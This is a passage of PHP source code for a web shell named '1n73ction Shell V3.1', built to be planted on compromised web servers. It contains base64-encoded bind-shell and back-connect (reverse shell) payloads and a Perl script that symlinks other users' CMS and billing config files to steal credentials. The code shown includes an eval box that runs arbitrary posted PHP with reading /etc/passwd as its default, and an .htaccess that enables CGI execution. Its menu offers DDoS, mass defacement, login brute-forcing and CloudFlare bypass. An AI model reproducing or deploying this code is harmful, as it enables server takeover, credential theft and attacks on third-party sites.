3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
|
||
|
Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
|
||
|
HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
|
||
|
tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
|
||
|
ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
|
||
|
uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
|
||
|
$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
|
||
|
NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
|
||
|
tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
|
||
|
e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
|
||
|
LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
|
||
|
vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
|
||
|
+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
|
||
|
$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
|
||
|
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
|
||
|
S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
|
||
|
ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
|
||
|
Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
|
||
|
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
|
||
|
BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
|
||
|
zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
|
||
|
i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
|
||
|
RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
|
||
|
jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
|
||
|
6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
|
||
|
//confshell
|
||
|
$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS5
|
||
|
?>
|
||
|
<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>
|
||
|
<script type="text/javascript">
|
||
|
function tukar(lama,baru){
|
||
|
document.getElementById(lama).style.display = 'none';
|
||
|
document.getElementById(baru).style.display = 'block';
|
||
|
}
|
||
|
</script>
|
||
|
<style type="text/css">
|
||
|
body{
|
||
|
background:#000000;;
|
||
|
}
|
||
|
a {
|
||
|
text-decoration:none;
|
||
|
}
|
||
|
a:hover{
|
||
|
border-bottom:1px solid #00ff00;
|
||
|
}
|
||
|
*{
|
||
|
font-size:11px;
|
||
|
font-family:Tahoma,Verdana,Arial;
|
||
|
color:#00ff00;
|
||
|
}
|
||
|
#menu{
|
||
|
background:#111111;
|
||
|
margin:8px 2px 4px 2px;
|
||
|
}
|
||
|
#menu a{
|
||
|
padding:4px 18px;
|
||
|
margin:0;
|
||
|
background:#222222;
|
||
|
text-decoration:none;
|
||
|
letter-spacing:2px;
|
||
|
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
|
||
|
}
|
||
|
#menu a:hover{
|
||
|
background:#191919;
|
||
|
border-bottom:1px solid #333333;
|
||
|
border-top:1px solid #333333;
|
||
|
}
|
||
|
.tabnet{
|
||
|
margin:15px auto 0 auto;
|
||
|
border: 1px solid #333333;
|
||
|
}
|
||
|
.main {
|
||
|
width:100%;
|
||
|
}
|
||
|
.gaya {
|
||
|
color: #00ff00;
|
||
|
}
|
||
|
.inputz{
|
||
|
background:#111111;
|
||
|
border:0;
|
||
|
padding:2px;
|
||
|
border-bottom:1px solid #222222;
|
||
|
border-top:1px solid #222222;
|
||
|
}
|
||
|
.inputzbut{
|
||
|
background:#111111;
|
||
|
color:#00ff00;
|
||
|
margin:0 4px;
|
||
|
border:1px solid #444444;
|
||
|
|
||
|
}
|
||
|
.inputz:hover, .inputzbut:hover{
|
||
|
border-bottom:1px solid #00ff00;
|
||
|
border-top:1px solid #00ff00;
|
||
|
}
|
||
|
.output {
|
||
|
margin:auto;
|
||
|
border:1px solid #00ff00;
|
||
|
width:100%;
|
||
|
height:400px;
|
||
|
background:#000000;
|
||
|
padding:0 2px;
|
||
|
}
|
||
|
.cmdbox{
|
||
|
width:100%;
|
||
|
}
|
||
|
.head_info{
|
||
|
padding: 0 4px;
|
||
|
}
|
||
|
.jaya{ font-family: ;}
|
||
|
|
||
|
.b374k{
|
||
|
font-size:30px;
|
||
|
padding:0;
|
||
|
color:#444444;
|
||
|
}
|
||
|
.b374k_tbl{
|
||
|
text-align:center;
|
||
|
margin:0 4px 0 0;
|
||
|
padding:0 4px 0 0;
|
||
|
border-right:1px solid #333333;
|
||
|
}
|
||
|
.phpinfo table{
|
||
|
width:100%;
|
||
|
padding:0 0 0 0;
|
||
|
}
|
||
|
.phpinfo td{
|
||
|
background:#111111;
|
||
|
color:#cccccc;
|
||
|
padding:6px 8px;;
|
||
|
}
|
||
|
.phpinfo th, th{
|
||
|
background:#191919;
|
||
|
border-bottom:1px solid #333333;
|
||
|
font-weight:normal;
|
||
|
}
|
||
|
.phpinfo h2, .phpinfo h2 a{
|
||
|
text-align:center;
|
||
|
font-size:16px;
|
||
|
padding:0;
|
||
|
margin:30px 0 0 0;
|
||
|
background:#222222;
|
||
|
padding:4px 0;
|
||
|
}
|
||
|
.explore{
|
||
|
width:100%;
|
||
|
}
|
||
|
.explore a {
|
||
|
text-decoration:none;
|
||
|
}
|
||
|
.explore td{
|
||
|
border-bottom:1px solid #333333;
|
||
|
padding:0 8px;
|
||
|
line-height:24px;
|
||
|
}
|
||
|
.explore th{
|
||
|
padding:3px 8px;
|
||
|
font-weight:normal;
|
||
|
}
|
||
|
.explore th:hover , .phpinfo th:hover{
|
||
|
border-bottom:1px solid #00ff00;
|
||
|
}
|
||
|
.explore tr:hover{
|
||
|
background:#111111;
|
||
|
}
|
||
|
.viewfile{
|
||
|
background:#EDECEB;
|
||
|
color:#000000;
|
||
|
margin:4px 2px;
|
||
|
padding:8px;
|
||
|
}
|
||
|
.sembunyi{
|
||
|
display:none;
|
||
|
padding:0;margin:0;
|
||
|
}
|
||
|
|
||
|
</style></head>
|
||
|
<script language='javascript'>
|
||
|
if (document.all||document.getElementById){
|
||
|
var thetitle=document.title
|
||
|
document.title=''
|
||
|
}
|
||
|
var data="Us3 Y0ur br41n biTch ! ! !";
|
||
|
var done=1;
|
||
|
function statusIn(text){
|
||
|
decrypt(text,22,22);
|
||
|
}
|
||
|
function statusOut(){
|
||
|
self.status='';
|
||
|
done=1;
|
||
|
}
|
||
|
function decrypt(text, max, delay){
|
||
|
if (done){
|
||
|
done = 0;
|
||
|
rantit(text, max, delay, 0, max);
|
||
|
}
|
||
|
}
|
||
|
function rantit(text, runs_left, delay, charvar, max){
|
||
|
if (!done){
|
||
|
runs_left = runs_left - 1;
|
||
|
var status = text.substring(0,charvar);
|
||
|
for(var current_char = charvar; current_char < text.length; current_char++){
|
||
|
status += data.charAt(Math.round(Math.random()*data.length));
|
||
|
}
|
||
|
document.title = status;
|
||
|
var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
|
||
|
var new_char = charvar + 1;
|
||
|
var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
|
||
|
if(runs_left > 0){
|
||
|
setTimeout(rerun, delay);
|
||
|
}
|
||
|
else{
|
||
|
if (charvar < text.length){
|
||
|
setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
done = 1;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
if (document.all||document.getElementById)
|
||
|
statusIn(thetitle)
|
||
|
</script>
|
||
|
|
||
|
<body onLoad="document.getElementById('cmd').focus();">
|
||
|
<div class="main">
|
||
|
<!-- head info start here -->
|
||
|
<div class="head_info">
|
||
|
<table ><tr>
|
||
|
<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>
|
||
|
<td><?php echo $buff; ?></td>
|
||
|
</tr></table>
|
||
|
</div>
|
||
|
<!-- head info end here -->
|
||
|
<!-- menu start -->
|
||
|
<center><div id="menu">
|
||
|
<a href="?<?php echo "y=".$pwd; ?>"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34"></a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=sql">Mysql</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=dump">Database Dump</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">Php Info</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=netsploit">Net Sploit</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=mail">E-Mail</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=sqli-scanner">SQLI Scan</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=port-sc">Port Scan</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=dos">Ddos</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=tool">Tools</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=python">python</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=symlink">Symlink</a><br><br>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=config">Config</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=bypass">Bypass</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=cgi">CgiShell</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=cgi2012">CGI Telnet 2012</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=domain">Domain</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=jodexer">Joomla IndChange</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=vb">VB IndChange</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=wp-reset">Wordpress ResPass</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=jm-reset">Joomla ResPass</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=whmcs">WHMCS Decoder</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=zone">Zone-H</a><br><br>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=wpbrute">Wordpress BruteForce</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=jbrute">Joomla BruteForce</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=brute">Cpanel BruteForce</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=bypass-cf">Bypass CloudFlare</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=adfin">Admin Finder</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=hash">Password Hash</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=string">Script Encode</a><br><br>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=whois">Website Whois</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=jss">Joomla Server Scanner</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=cms_detect">Cms Detector</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=tutor">Tutorial & Ebook</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=about">About</a>
|
||
|
<a href="?<?php echo "y=".$pwd; ?>&x=logout">Log-Out</a>
|
||
|
|
||
|
|
||
|
</div></center>
|
||
|
<!-- menu end -->
|
||
|
|
||
|
<?php
|
||
|
@ini_set('display_errors', 0);
|
||
|
if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=php" method="post">
|
||
|
<table class="cmdbox">
|
||
|
<tr><td>
|
||
|
<textarea class="output" name="cmd" id="cmd">
|
||
|
<?php
|
||
|
if(isset($_POST['submitcmd'])) {
|
||
|
echo eval(magicboom($_POST['cmd']));
|
||
|
}
|
||
|
else echo "echo file_get_contents('/etc/passwd');";
|
||
|
?>
|
||
|
</textarea>
|
||
|
<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
|
||
|
</table>
|
||
|
</form>
|
||
|
|
||
|
<?php }
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'sql'))
|
||
|
{
|
||
|
?>
|
||
|
<form action="?y=<?php echo $pwd; ?>&x=sql" method="post">
|
||
|
<?php
|
||
|
echo "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";
|
||
|
mkdir('mysql', 0755);
|
||
|
chdir('mysql');
|
||
|
$akses = ".htaccess";
|
||
|
$buka_lah = "$akses";
|
||
|
$buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
|
||
|
$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
|
||
|
AddType application/x-httpd-php .cpc
|
||
|
";
|
||
|
fwrite ( $buka , $metin ) ;
|
||
|
fclose ($buka);
|
||
|
$sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIs